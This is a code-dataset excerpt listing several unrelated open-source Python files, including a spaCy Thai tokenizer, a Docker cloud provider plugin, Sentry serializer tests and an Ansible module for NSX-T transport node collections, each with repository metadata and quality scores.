max_stars_repo_path
stringlengths
3
269
max_stars_repo_name
stringlengths
4
119
max_stars_count
int64
0
191k
id
stringlengths
1
7
content
stringlengths
6
1.05M
score
float64
0.23
5.13
int_score
int64
0
5
spacy/lang/th/__init__.py
snosrap/spaCy
1
16700
from .stop_words import STOP_WORDS from .lex_attrs import LEX_ATTRS from ...language import Language, BaseDefaults from ...tokens import Doc from ...util import DummyTokenizer, registry, load_config_from_str from ...vocab import Vocab DEFAULT_CONFIG = """ [nlp] [nlp.tokenizer] @tokenizers = "spacy.th.ThaiTokenizer" """ @registry.tokenizers("spacy.th.ThaiTokenizer") def create_thai_tokenizer(): def thai_tokenizer_factory(nlp): return ThaiTokenizer(nlp.vocab) return thai_tokenizer_factory class ThaiTokenizer(DummyTokenizer): def __init__(self, vocab: Vocab) -> None: try: from pythainlp.tokenize import word_tokenize except ImportError: raise ImportError( "The Thai tokenizer requires the PyThaiNLP library: " "https://github.com/PyThaiNLP/pythainlp" ) from None self.word_tokenize = word_tokenize self.vocab = vocab def __call__(self, text: str) -> Doc: words = list(self.word_tokenize(text)) spaces = [False] * len(words) return Doc(self.vocab, words=words, spaces=spaces) class ThaiDefaults(BaseDefaults): config = load_config_from_str(DEFAULT_CONFIG) lex_attr_getters = LEX_ATTRS stop_words = STOP_WORDS class Thai(Language): lang = "th" Defaults = ThaiDefaults __all__ = ["Thai"]
2.46875
2
src/setup/__init__.py
ScottDay/DFN-Maintenance-GUI-Backend
2
16701
from .args import args from .extensions import extensions from .logger import logger from .routes import routes __all__ = ['args', 'extensions', 'logger', 'routes']
1.289063
1
cloudrunner_server/plugins/clouds/docker_host.py
ttrifonov/cloudrunner-server
2
16702
#!/usr/bin/python # -*- coding: utf-8 -*- # vim: tabstop=4 shiftwidth=4 softtabstop=4 # /******************************************************* # * Copyright (C) 2013-2014 CloudRunner.io <<EMAIL>> # * # * Proprietary and confidential # * This file is part of CloudRunner Server. # * # * CloudRunner Server can not be copied and/or distributed # * without the express permission of CloudRunner.io # *******************************************************/ import json import os import requests import tempfile from cloudrunner import VAR_DIR from .base import BaseCloudProvider, CR_SERVER HEADERS = {'Content-Type': 'application/json'} class Docker(BaseCloudProvider): def __init__(self, profile, log=None): super(Docker, self).__init__(profile, log) prefix = "%s-%s" % (self.profile.owner.org.name, self.profile.id) self._path = os.path.join(VAR_DIR, "tmp", "creds", prefix) if ":" in self.profile.username: self.server_address = self.profile.username else: self.server_address = "%s:2376" % self.profile.username try: os.makedirs(self._path) except: pass _, self._cert_path = tempfile.mkstemp(dir=self._path, suffix='pem', text=True) _, self._key_path = tempfile.mkstemp(dir=self._path, suffix='pem', text=True) with open(self._cert_path, 'w') as f: f.write(self.profile.password) with open(self._key_path, 'w') as f: f.write(self.profile.arguments) def _cleanup(self): os.unlink(self._cert_path) os.unlink(self._key_path) def create_machine(self, name, image=None, server=CR_SERVER, ports=None, privileged=None, volumes=None, **kwargs): self.log.info("Registering Docker machine [%s::%s] for [%s] at [%s]" % (name, image, CR_SERVER, self.server_address)) priv = privileged in ['1', 'true', 'True', True] # cmd = PROVISION % dict(server=server, # name=name, # api_key=self.api_key) exposed_ports, port_bindings = {}, {} _ports = [p.strip() for p in ports.split(",") if p.strip()] for port in _ports: cont_port, _, host_port = port.partition(":") exposed = "%s/tcp" % cont_port exposed_ports[exposed] = {} if host_port: host_port = host_port port_bindings[exposed] = [{ 'HostPort': host_port }] else: port_bindings[exposed] = [{ 'HostPort': None }] volumes_desc, binds = {}, [] _volumes = [v.strip() for v in volumes.split(",") if v.strip()] for _vol in _volumes: mnt_host, _, mnt_cont = _vol.partition(":") if not mnt_cont: mnt_cont = mnt_host mnt_host = '' volumes_desc[mnt_cont] = {} if mnt_host: binds.append("%s:%s" % (mnt_host, mnt_cont)) else: binds.append("%s:%s" % (mnt_cont, mnt_cont)) env = ["SERVER_ID=%s" % CR_SERVER, "ORG_ID=%s" % self.api_key] create_data = dict(Hostname=name, Image=image, Env=env, ExposedPorts=exposed_ports, Volumes=volumes_desc, Privileged=priv, Tty=True, OpenStdin=True,) # Cmd=[cmd], # Entrypoint=['/bin/curl']) create_url = "https://%s/containers/create" % self.server_address try: server_ids = [] res = requests.post(create_url, data=json.dumps(create_data), cert=(self._cert_path, self._key_path), headers=HEADERS, verify=False) if res.status_code >= 300: self.log.error("FAILURE %s(%s)" % (res.status_code, res.content)) return self.FAIL, [], {} start_data = dict(PortBindings=port_bindings, Binds=binds, Privileged=priv, Detach=False, Tty=False) server_id = res.json()['Id'] self.log.info("Started docker instance %s" % server_id) server_ids.append(server_id) start_url = "https://%s/containers/%s/start" % ( self.server_address, server_id) res = requests.post(start_url, data=json.dumps(start_data), cert=(self._cert_path, self._key_path), headers=HEADERS, verify=False) meta = dict(server_address=self.server_address) except Exception, ex: self.log.exception(ex) raise finally: self._cleanup() return self.OK, server_ids, meta def delete_machine(self, server_ids, **kwargs): ret = self.OK for server_id in server_ids: try: delete_url = "https://%s/containers/%s?force=true" % ( self.server_address, server_id) res = requests.delete(delete_url, cert=(self._cert_path, self._key_path), headers=HEADERS, verify=False) if res.status_code >= 300: self.log.error("FAILURE %s(%s)" % (res.status_code, res.content)) ret = self.FAIL except Exception, ex: self.log.error(ex) return ret
1.859375
2
scope/client_util/job_runner_check.py
drew-sinha/rpc-scope
1
16703
# -*- coding: utf-8 -*- # This code is licensed under the MIT License (see LICENSE file for details) import platform import datetime import sys import pathlib import subprocess import time from .. import scope_job_runner from ..config import scope_configuration def main(): if len(sys.argv) == 2 and sys.argv[1] == '--install': install_systemd_units() else: check_job_runner() TIMER_UNIT = '''[Unit] Description=Check that scope_job_runner is active if jobs are queued [Timer] OnBootSec=15min OnUnitActiveSec=45min [Install] WantedBy=timers.target ''' SERVICE_UNIT = '''[Unit] Description=Check that scope_job_runner is active if jobs are queued [Service] ExecStart={executable} ''' def install_systemd_units(): base_unit = pathlib.Path('/etc/systemd/system/job_runner_check') timer_file = base_unit.with_suffix('.timer') timer_file.write_text(TIMER_UNIT) timer_file.chmod(0o644) service_file = base_unit.with_suffix('.service') service_file.write_text(SERVICE_UNIT.format(executable=sys.argv[0])) service_file.chmod(0o644) subprocess.run(['systemctl', 'enable', timer_file.name], check=True) subprocess.run(['systemctl', 'start', timer_file.name], check=True) print(f'systemd units installed. Run systemctl status {timer_file.name} or {base_unit.name} to check.') ERROR_SUBJECT = '{host}: scope job pending but scope_job_runner is inactive.' ERROR_MESSAGE = '''One or more of your jobs is overdue on {host}, but the scope job runner daemon is not running. These jobs will not be run until the command `scope_job_runner start` is executed on that machine. Time: {time} Queued Jobs: {jobs} ''' ALL_CLEAR_SUBJECT = '{host}: scope_job_runner was reactivated.' ALL_CLEAR_MESSAGE = '''One or more of your jobs on {host} was stalled due to an inactive job runner. The job runner has now been restarted and your jobs will be run as planned. Time: {time} Queued Jobs: {jobs} ''' def check_job_runner(): runner = scope_job_runner.JobRunner() problem_file = scope_configuration.CONFIG_DIR / '.jobs_queued_but_runner_inactive' overdue_jobs, to_email = get_overdue_jobs(runner) if len(overdue_jobs) == 0: return if runner.is_running(): if problem_file.exists(): # job runner was restarted; problem is cleared. # Alert previous email recipients that things are good now print('Previous error, but now job runner is running.') send_email(to_email, runner, overdue_jobs, ALL_CLEAR_SUBJECT, ALL_CLEAR_MESSAGE, 'all-clear') # Remove the problem-file flag problem_file.unlink() else: # job runner is not running. print('Jobs queued but job runner is not running.') previously_emailed = set() if problem_file.exists(): # this error was previously detected previously_emailed.update(problem_file.read_text().split('\n')) to_email -= previously_emailed if to_email: # we have not alerted some people about the queued jobs send_email(to_email, runner, overdue_jobs, ERROR_SUBJECT, ERROR_MESSAGE, 'alert') problem_file.write_text('\n'.join(to_email | previously_emailed)) else: print('No alert emailed: all relevant parties have already been emailed.') def get_overdue_jobs(runner): # Get overdue jobs that anyone cares about (e.g. that aren't system checks and have # emails attached). now = time.time() exec_dir = pathlib.Path(sys.argv[0]).parent overdue_jobs = [] to_email = set() for job in runner.jobs.get_jobs(): if ( job.exec_file.parent != exec_dir and # job is user-provided, not like incubator_check job.status == scope_job_runner.STATUS_QUEUED and # and is active job.next_run_time is not None and # and is scheduled to run again job.next_run_time < now and # and is overdue job.alert_emails ): # and has a non-empty, non-None list of people to alert overdue_jobs.append(job) to_email.update(job.alert_emails) return overdue_jobs, to_email def send_email(to_email, runner, jobs, subject_template, body_template, email_type): host = platform.node().split('.')[0] now = datetime.datetime.now().isoformat(sep=' ', timespec='seconds') subject = subject_template.format(host=host) job_blurbs = '\n'.join(runner.format_job_blurb(job) for job in jobs) message = body_template.format(host=host, time=now, jobs=job_blurbs) print('Emailing {} about the following jobs:\n{}'.format(email_type, job_blurbs)) runner.send_error_email(sorted(to_email), subject, message)
2.28125
2
toffy/json_utils.py
angelolab/toffy
0
16704
<filename>toffy/json_utils.py<gh_stars>0 import copy import json import os from ark.utils import io_utils def rename_missing_fovs(fov_data): """Identify FOVs that are missing the 'name' key and create one with value placeholder_{n} Args: fov_data (dict): the FOV run JSON data Returns: dict: a copy of the run JSON data with placeholder names for FOVs that lack one """ copy_fov_data = copy.deepcopy(fov_data) # count of FOVs that are missing the 'name' key missing_count = 0 # iterate over each FOV and add a placeholder name if necessary for fov in copy_fov_data['fovs']: if 'name' not in fov.keys(): missing_count += 1 fov['name'] = f'placeholder_{missing_count}' return copy_fov_data def rename_duplicate_fovs(tma_fovs): """Identify and rename duplicate FOV names in `fov_list` For a given FOV name, the subsequent duplicates get renamed `{FOV}_duplicate{n}` Args: tma_fovs (dict): The TMA run JSON, should contain a `'fovs'` key defining the list of FOVs Returns: dict: The same run JSON with the FOVs renamed to account for duplicates """ # used for identifying the number of times each FOV was found fov_count = {} # iterate over each FOV for fov in tma_fovs['fovs']: if fov['name'] not in fov_count: fov_count[fov['name']] = 0 fov_count[fov['name']] += 1 if fov_count[fov['name']] > 1: fov['name'] = '%s_duplicate%d' % (fov['name'], fov_count[fov['name']] - 1) return tma_fovs def list_moly_fovs(bin_file_dir): """Lists all of the FOVs in a directory which are moly FOVs Args: bin_file_dir (str): path to bin files Returns: list: list of FOVs which are moly FOVs""" json_files = io_utils.list_files(bin_file_dir, '.json') moly_fovs = [] for file in json_files: json_path = os.path.join(bin_file_dir, file) with open(json_path, 'r') as jp: json_file = json.load(jp) if json_file.get('standardTarget', "") == "Molybdenum Foil": moly_name = file.split('.json')[0] moly_fovs.append(moly_name) return moly_fovs
3.21875
3
app/plugins/task/upload.py
venturiscm/hcp
1
16705
from systems.plugins.index import BaseProvider import os class Provider(BaseProvider('task', 'upload')): def execute(self, results, params): file_path = self.get_path(self.field_file) if not os.path.exists(file_path): self.command.error("Upload task provider file {} does not exist".format(file_path)) ssh = self._get_ssh() ssh.upload(file_path, self.field_remote_path, mode = self.field_mode, owner = self.field_owner, group = self.field_group )
2.3125
2
win_dein_deoplete/.vim/.cache/.vimrc/.dein/rplugin/python3/denite/source/outline.py
takkii/dotfile
1
16706
# ============================================================================ # FILE: outline.py # AUTHOR: <NAME> (tamura.yasumasa _at_ gmail.com) # License: MIT license # ============================================================================ from .base import Base from subprocess import check_output, CalledProcessError from denite.util import parse_tagline import re import tempfile OUTLINE_HIGHLIGHT_SYNTAX = [ {'name': 'Name', 'link': 'Identifier', 're': '\S\+\%(\s\+\[\)\@='}, {'name': 'Type', 'link': 'Type', 're': '\[.\{-}\]'}, {'name': 'Ref', 'link': 'Comment', 're': '\s\s.\+'} ] class Source(Base): def __init__(self, vim): super().__init__(vim) self.name = 'outline' self.kind = 'file' self.vars = { 'command': ['ctags'], 'options': [], 'file_opt': '-o', 'ignore_types': [], 'encoding': 'utf-8' } def on_init(self, context): context['__path'] = context['args'][0] if len( context['args']) > 0 else self.vim.current.buffer.name def highlight(self): for syn in OUTLINE_HIGHLIGHT_SYNTAX: self.vim.command( 'syntax match {0}_{1} /{2}/ contained containedin={0}'.format( self.syntax_name, syn['name'], syn['re'])) self.vim.command( 'highlight default link {0}_{1} {2}'.format( self.syntax_name, syn['name'], syn['link'])) def gather_candidates(self, context): with tempfile.NamedTemporaryFile( mode='w', encoding=self.vars['encoding']) as tf: args = [] args += self.vars['command'] args += self.vars['options'] args += [self.vars['file_opt'], tf.name] args += [context['__path']] self.print_message(context, args) tf.close() try: check_output(args).decode(self.vars['encoding'], 'replace') except CalledProcessError: return [] candidates = [] with open(tf.name, encoding=self.vars['encoding'], errors='replace') as f: for line in f: if re.match('!', line) or not line: continue info = parse_tagline(line.rstrip(), tf.name) candidate = { 'word': info['name'], 'action__path': info['file'], } fmt = '{name} [{type}] {file} {ref}' candidate['abbr'] = fmt.format(**info) if info['line']: candidate['action__line'] = info['line'] else: candidate['action__pattern'] = info['pattern'] candidates.append(candidate) return candidates
2.203125
2
test.py
Tweetsched/tweetsched-publisher
1
16707
<reponame>Tweetsched/tweetsched-publisher<filename>test.py from base64 import b64encode from app import app import unittest from mock import patch import os import json from twython import Twython class TestApp(unittest.TestCase): def setUp(self): self.app = app.test_client() os.environ['SERVICE_KEY'] = 'test-key' os.environ['SERVICE_PASS'] = '<PASSWORD>' os.environ['APP_KEY'] = 'test-key' os.environ['APP_SECRET'] = 'test-secret' os.environ['OAUTH_TOKEN'] = 'test-oauth-token' os.environ['OAUTH_TOKEN_SECRET'] = 'test-oauth-token-secret' @patch('app.Twython.update_status') def test_publish_tweet(self, update_status_mock): update_status_mock.return_value = True auth = (os.environ['SERVICE_KEY'] + ':' + os.environ['SERVICE_PASS']).encode('utf-8') headers = { 'Authorization': 'Basic ' + b64encode(auth).decode() } rv = self.app.post('/api/v1/tweets', data = json.dumps(dict(id = 3, message = 'test tweet', profileId = '1')), content_type = 'application/json', headers = headers) self.assertEqual(rv.status_code, 200) self.assertEqual(update_status_mock.call_count, 1) update_status_mock.assert_called_once() def test_404(self): auth = (os.environ['SERVICE_KEY'] + ':' + os.environ['SERVICE_PASS']).encode('utf-8') headers = { 'Authorization': 'Basic ' + b64encode(auth).decode() } rv = self.app.get('/i-am-not-found', headers=headers) self.assertEqual(rv.status_code, 404) if __name__ == '__main__': unittest.main()
2.5
2
Python/01. Fundamentals/01. Simple Calculators/08. Temperature Converter/tempCoverter.py
darioGerussi/exercises
1
16708
# Converts a given temperature from Celsius to Fahrenheit # Prompt user for Celsius temperature degreesCelsius = float(input('\nEnter the temperature in Celsius: ')) # Calculate and display the converted # temperature in Fahrenheit degreesFahrenheit = ((9.0 / 5.0) * degreesCelsius) + 32 print('Fahrenheit equivalent: ', format(degreesFahrenheit, ',.1f'), '\n', sep='')
4.4375
4
website/models/post.py
LKKTGB/lkkpomia
0
16709
from bs4 import BeautifulSoup from django.db import models from django.utils.translation import ugettext_lazy as _ from taggit.managers import TaggableManager class Post(models.Model): title = models.CharField(_('post_title'), max_length=100) body = models.TextField(_('post_body')) tags = TaggableManager(_('post_tags'), help_text=_('post_tags_help_text')) create_time = models.DateTimeField(_('post_create_time'), auto_now_add=True) update_time = models.DateTimeField(_('post_update_time'), auto_now=True) class Meta: verbose_name = _('post') verbose_name_plural = _('posts') @staticmethod def autocomplete_search_fields(): return ('id__iexact', 'title__icontains',) def __str__(self): return self.title @property def cover_url(self): soup = BeautifulSoup(self.body, 'html.parser') tags = soup.findAll('img') return tags[0]['src'] if tags else None @property def summary(self): soup = BeautifulSoup(self.body, 'html.parser') for br in soup.find_all("br"): br.replace_with("\n") ps = [t for t in soup.findAll('p') if t.text.strip()] return ps[0].text if ps else None
2.328125
2
tests/sentry/api/serializers/test_alert_rule.py
kinghuang/sentry
1
16710
<reponame>kinghuang/sentry # -*- coding: utf-8 -*- from __future__ import absolute_import import six from sentry.api.serializers import serialize from sentry.api.serializers.models.alert_rule import DetailedAlertRuleSerializer from sentry.incidents.logic import create_alert_rule, create_alert_rule_trigger from sentry.incidents.models import AlertRuleThresholdType from sentry.snuba.models import QueryAggregations from sentry.testutils import TestCase class BaseAlertRuleSerializerTest(object): def assert_alert_rule_serialized(self, alert_rule, result): assert result["id"] == six.text_type(alert_rule.id) assert result["organizationId"] == six.text_type(alert_rule.organization_id) assert result["name"] == alert_rule.name assert result["thresholdType"] == alert_rule.threshold_type assert result["dataset"] == alert_rule.dataset assert result["query"] == alert_rule.query assert result["aggregation"] == alert_rule.aggregation assert result["timeWindow"] == alert_rule.time_window assert result["resolution"] == alert_rule.resolution assert result["alertThreshold"] == alert_rule.alert_threshold assert result["resolveThreshold"] == alert_rule.resolve_threshold assert result["thresholdPeriod"] == alert_rule.threshold_period assert result["includeAllProjects"] == alert_rule.include_all_projects assert result["dateModified"] == alert_rule.date_modified assert result["dateAdded"] == alert_rule.date_added class AlertRuleSerializerTest(BaseAlertRuleSerializerTest, TestCase): def test_simple(self): alert_rule = create_alert_rule( self.organization, [self.project], "hello", AlertRuleThresholdType.ABOVE, "level:error", QueryAggregations.TOTAL, 10, 1000, 400, 1, ) result = serialize(alert_rule) self.assert_alert_rule_serialized(alert_rule, result) def test_triggers(self): alert_rule = self.create_alert_rule() other_alert_rule = self.create_alert_rule() trigger = create_alert_rule_trigger(alert_rule, "test", AlertRuleThresholdType.ABOVE, 1000) result = serialize([alert_rule, other_alert_rule]) assert result[0]["triggers"] == [serialize(trigger)] assert result[1]["triggers"] == [] class DetailedAlertRuleSerializerTest(BaseAlertRuleSerializerTest, TestCase): def test_simple(self): projects = [self.project, self.create_project()] alert_rule = self.create_alert_rule(projects=projects) result = serialize(alert_rule, serializer=DetailedAlertRuleSerializer()) self.assert_alert_rule_serialized(alert_rule, result) assert sorted(result["projects"]) == sorted([p.slug for p in projects]) assert result["excludedProjects"] == [] def test_excluded_projects(self): projects = [self.project] excluded = [self.create_project()] alert_rule = self.create_alert_rule( projects=[], include_all_projects=True, excluded_projects=excluded ) result = serialize(alert_rule, serializer=DetailedAlertRuleSerializer()) self.assert_alert_rule_serialized(alert_rule, result) assert result["projects"] == [p.slug for p in projects] assert result["excludedProjects"] == [p.slug for p in excluded] alert_rule = self.create_alert_rule(projects=projects, include_all_projects=False) result = serialize(alert_rule, serializer=DetailedAlertRuleSerializer()) self.assert_alert_rule_serialized(alert_rule, result) assert result["projects"] == [p.slug for p in projects] assert result["excludedProjects"] == [] def test_triggers(self): alert_rule = self.create_alert_rule() other_alert_rule = self.create_alert_rule() trigger = create_alert_rule_trigger(alert_rule, "test", AlertRuleThresholdType.ABOVE, 1000) result = serialize([alert_rule, other_alert_rule], serializer=DetailedAlertRuleSerializer()) assert result[0]["triggers"] == [serialize(trigger)] assert result[1]["triggers"] == []
1.960938
2
mys/cli/subparsers/test.py
nsauzede/mys
0
16711
import os from ..utils import add_jobs_argument from ..utils import add_no_ccache_argument from ..utils import add_optimize_argument from ..utils import add_verbose_argument from ..utils import build_prepare from ..utils import run def do_test(_parser, args, _mys_config): build_prepare(args.verbose, args.optimize, args.no_ccache) command = [ 'make', '-f', 'build/Makefile', 'test', 'TEST=yes' ] if os.getenv('MAKEFLAGS') is None: command += ['-j', str(args.jobs)] if args.debug: command += ['TRANSPILE_DEBUG=--debug'] run(command, 'Building tests', args.verbose) run(['./build/test'], 'Running tests', args.verbose) def add_subparser(subparsers): subparser = subparsers.add_parser( 'test', description='Build and run tests.') add_verbose_argument(subparser) add_jobs_argument(subparser) add_optimize_argument(subparser, 'debug') add_no_ccache_argument(subparser) subparser.set_defaults(func=do_test)
2.15625
2
plugins/modules/nsxt_transport_node_collections.py
madhukark/ansible-for-nsxt
0
16712
<gh_stars>0 #!/usr/bin/env python # -*- coding: utf-8 -*- # # Copyright 2018 VMware, Inc. # SPDX-License-Identifier: BSD-2-Clause OR GPL-3.0-only # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, # BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. # IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, # SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; # LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, # WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, # EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. from __future__ import absolute_import, division, print_function __metaclass__ = type ANSIBLE_METADATA = {'metadata_version': '1.1', 'status': ['preview'], 'supported_by': 'community'} DOCUMENTATION = ''' --- module: nsxt_transport_node_collections short_description: Create transport node collection by attaching Transport Node Profile to cluster. description: When transport node collection is created the hosts which are part of compute collection will be prepared automatically i.e. NSX Manager attempts to install the NSX components on hosts. Transport nodes for these hosts are created using the configuration specified in transport node profile. version_added: "2.7" author: <NAME> options: hostname: description: Deployed NSX manager hostname. required: true type: str username: description: The username to authenticate with the NSX manager. required: true type: str password: description: The password to authenticate with the NSX manager. required: true type: str cluster_name: description: CLuster Name required: false type: str compute_manager_name: description: Cluster Manager Name required: false type: str description: description: Description required: true type: str display_name: description: Display name required: true type: str resource_type: description: "Must be set to the value TransportNodeCollection" required: true type: str state: choices: - present - absent description: "State can be either 'present' or 'absent'. 'present' is used to create or update resource. 'absent' is used to delete resource." required: true transport_node_profile_name: description: Transport Node Profile Names required: true type: str ''' EXAMPLES = ''' - name: Create transport node collection nsxt_transport_node_collections: hostname: "{{hostname}}" username: "{{username}}" password: "{{password}}" validate_certs: False display_name: "TNC1" resource_type: "TransportNodeCollection" description: "Transport Node Collections 1" compute_manager_name: "VC1" cluster_name: "cl1" transport_node_profile_name: "TNP1" state: present ''' RETURN = '''# ''' import json, time from ansible.module_utils.basic import AnsibleModule from ansible_collections.vmware.ansible_for_nsxt.plugins.module_utils.vmware_nsxt import vmware_argument_spec, request from ansible.module_utils._text import to_native import ssl import socket import hashlib def get_transport_node_collections_params(args=None): args_to_remove = ['state', 'username', 'password', 'port', 'hostname', 'validate_certs'] for key in args_to_remove: args.pop(key, None) for key, value in args.copy().items(): if value == None: args.pop(key, None) return args def get_transport_node_collections(module, manager_url, mgr_username, mgr_password, validate_certs): try: (rc, resp) = request(manager_url+ '/transport-node-collections', headers=dict(Accept='application/json'), url_username=mgr_username, url_password=mgr_password, validate_certs=validate_certs, ignore_errors=True) except Exception as err: module.fail_json(msg='Error accessing transport-node-collections. Error [%s]' % (to_native(err))) return resp def get_id_from_display_name(module, manager_url, mgr_username, mgr_password, validate_certs, endpoint, display_name, exit_if_not_found=True): try: (rc, resp) = request(manager_url+ endpoint, headers=dict(Accept='application/json'), url_username=mgr_username, url_password=<PASSWORD>, validate_certs=validate_certs, ignore_errors=True) except Exception as err: module.fail_json(msg='Error accessing id for display name %s. Error [%s]' % (display_name, to_native(err))) for result in resp['results']: if result.__contains__('display_name') and result['display_name'] == display_name: return result['id'] if exit_if_not_found: module.fail_json(msg='No id exist with display name %s' % display_name) def get_transport_node_collection_from_display_name(module, manager_url, mgr_username, mgr_password, validate_certs, display_name): transport_node_collections = get_transport_node_collections(module, manager_url, mgr_username, mgr_password, validate_certs) for transport_node_collection in transport_node_collections['results']: if transport_node_collection.__contains__('display_name') and transport_node_collection['display_name'] == display_name: return transport_node_collection return None def wait_till_delete(id, module, manager_url, mgr_username, mgr_password, validate_certs): try: while True: (rc, resp) = request(manager_url+ '/transport-node-collections/%s'% id, headers=dict(Accept='application/json'), url_username=mgr_username, url_password=<PASSWORD>, validate_certs=validate_certs, ignore_errors=True) time.sleep(10) except Exception as err: time.sleep(5) return def get_transport_node_profile_id (module, manager_url, mgr_username, mgr_password, validate_certs, transport_node_profile_name): try: return get_id_from_display_name (module, manager_url, mgr_username, mgr_password, validate_certs, "/transport-node-profiles", transport_node_profile_name) except Exception as err: module.fail_json(msg='Error accessing id for display name %s. Error [%s]' % (transport_node_profile_name, to_native(err))) def get_compute_collection_id (module, manager_url, mgr_username, mgr_password, validate_certs, manager_name, cluster_name): try: (rc, resp) = request(manager_url+ '/fabric/compute-collections', headers=dict(Accept='application/json'), url_username=mgr_username, url_password=<PASSWORD>, validate_certs=validate_certs, ignore_errors=True) compute_manager_id = get_id_from_display_name (module, manager_url, mgr_username, mgr_password, validate_certs, "/fabric/compute-managers", manager_name) except Exception as err: module.fail_json(msg='Error accessing compute collection id for manager %s, cluster %s. Error [%s]' % (manager_name, cluster_name, to_native(err))) for result in resp['results']: if result.__contains__('display_name') and result['display_name'] == cluster_name and \ result['origin_id'] == compute_manager_id: return result['external_id'] module.fail_json(msg='No compute collection id exist with cluster name %s for compute manager %s' % (cluster_name, manager_name)) def update_params_with_id (module, manager_url, mgr_username, mgr_password, validate_certs, transport_node_collection_params ): compute_manager_name = transport_node_collection_params.pop('compute_manager_name', None) compute_cluster_name = transport_node_collection_params.pop('cluster_name', None) compute_collection_id = get_compute_collection_id (module, manager_url, mgr_username, mgr_password, validate_certs, compute_manager_name, compute_cluster_name) transport_node_collection_params['compute_collection_id'] = compute_collection_id transport_node_profile_name = transport_node_collection_params.pop('transport_node_profile_name', None) transport_node_profile_id = get_transport_node_profile_id (module, manager_url, mgr_username, mgr_password, validate_certs, transport_node_profile_name) transport_node_collection_params['transport_node_profile_id'] = transport_node_profile_id return transport_node_collection_params def check_for_update(module, manager_url, mgr_username, mgr_password, validate_certs, transport_node_collection_with_ids): existing_tnc = get_transport_node_collection_from_display_name(module, manager_url, mgr_username, mgr_password, validate_certs, transport_node_collection_with_ids['display_name']) if existing_tnc is None: return False if existing_tnc['compute_collection_id'] == transport_node_collection_with_ids['compute_collection_id'] and \ existing_tnc['transport_node_profile_id'] != transport_node_collection_with_ids['transport_node_profile_id']: return True return False def main(): argument_spec = vmware_argument_spec() argument_spec.update(display_name=dict(required=True, type='str'), description=dict(required=True, type='str'), resource_type=dict(required=True, type='str'), transport_node_profile_name=dict(required=True, type='str'), compute_manager_name=dict(required=False, type='str'), cluster_name=dict(required=False, type='str'), state=dict(required=True, choices=['present', 'absent'])) module = AnsibleModule(argument_spec=argument_spec, supports_check_mode=True) transport_node_collections_params = get_transport_node_collections_params(module.params.copy()) state = module.params['state'] mgr_hostname = module.params['hostname'] mgr_username = module.params['username'] mgr_password = module.params['password'] validate_certs = module.params['validate_certs'] display_name = module.params['display_name'] manager_url = 'https://{}/api/v1'.format(mgr_hostname) transport_node_collections_dict = get_transport_node_collection_from_display_name (module, manager_url, mgr_username, mgr_password, validate_certs, display_name) transport_node_collection_id, revision = None, None if transport_node_collections_dict: transport_node_collection_id = transport_node_collections_dict['id'] revision = transport_node_collections_dict['_revision'] if state == 'present': body = update_params_with_id(module, manager_url, mgr_username, mgr_password, validate_certs, transport_node_collections_params) updated = check_for_update(module, manager_url, mgr_username, mgr_password, validate_certs, body) headers = dict(Accept="application/json") headers['Content-Type'] = 'application/json' if not updated: # add the transport_node_collections request_data = json.dumps(transport_node_collections_params) if module.check_mode: module.exit_json(changed=True, debug_out=str(request_data), id='12345') try: if transport_node_collection_id: module.exit_json(changed=False, id=transport_node_collection_id, message="transport-node-collection with display_name %s already exist on cluster %s." % (module.params['display_name'], module.params['cluster_name'])) (rc, resp) = request(manager_url+ '/transport-node-collections', data=request_data, headers=headers, method='POST', url_username=mgr_username, url_password=<PASSWORD>, validate_certs=validate_certs, ignore_errors=True) except Exception as err: module.fail_json(msg="Failed to add transport_node_collections. Request body [%s]. Error[%s]." % (request_data, to_native(err))) module.exit_json(changed=True, id=resp["id"], body= str(resp), message="transport-node-collection created for cluster %s." % module.params['cluster_name']) else: if module.check_mode: module.exit_json(changed=True, debug_out=str(json.dumps(transport_node_collections_params)), id=transport_node_collection_id) transport_node_collections_params['_revision'] = revision # update current revision request_data = json.dumps(transport_node_collections_params) id = transport_node_collection_id try: (rc, resp) = request(manager_url+ '/transport-node-collections/%s' % id, data=request_data, headers=headers, method='PUT', url_username=mgr_username, url_password=<PASSWORD>, validate_certs=validate_certs, ignore_errors=True) except Exception as err: module.fail_json(msg="Failed to update transport_node_collections with id %s. Request body [%s]. Error[%s]." % (id, request_data, to_native(err))) module.exit_json(changed=True, id=resp["id"], body= str(resp), message="transport-node-collection with Compute collection fabric template id %s updated." % id) elif state == 'absent': # delete the array id = transport_node_collection_id if id is None: module.exit_json(changed=False, msg='No transport-node-collection exist with display_name %s' % display_name) if module.check_mode: module.exit_json(changed=True, debug_out=str(json.dumps(transport_node_collections_params)), id=id) try: (rc, resp) = request(manager_url + "/transport-node-collections/%s" % id, method='DELETE', url_username=mgr_username, url_password=<PASSWORD>, validate_certs=validate_certs) except Exception as err: module.fail_json(msg="Failed to delete transport-node-collection with name %s. Error[%s]." % (display_name, to_native(err))) wait_till_delete(id, module, manager_url, mgr_username, mgr_password, validate_certs) module.exit_json(changed=True, id=id, message="transport-node-collection with name %s deleted." % display_name) if __name__ == '__main__': main()
1.265625
1
training/loss.py
drboog/Lafite
45
16713
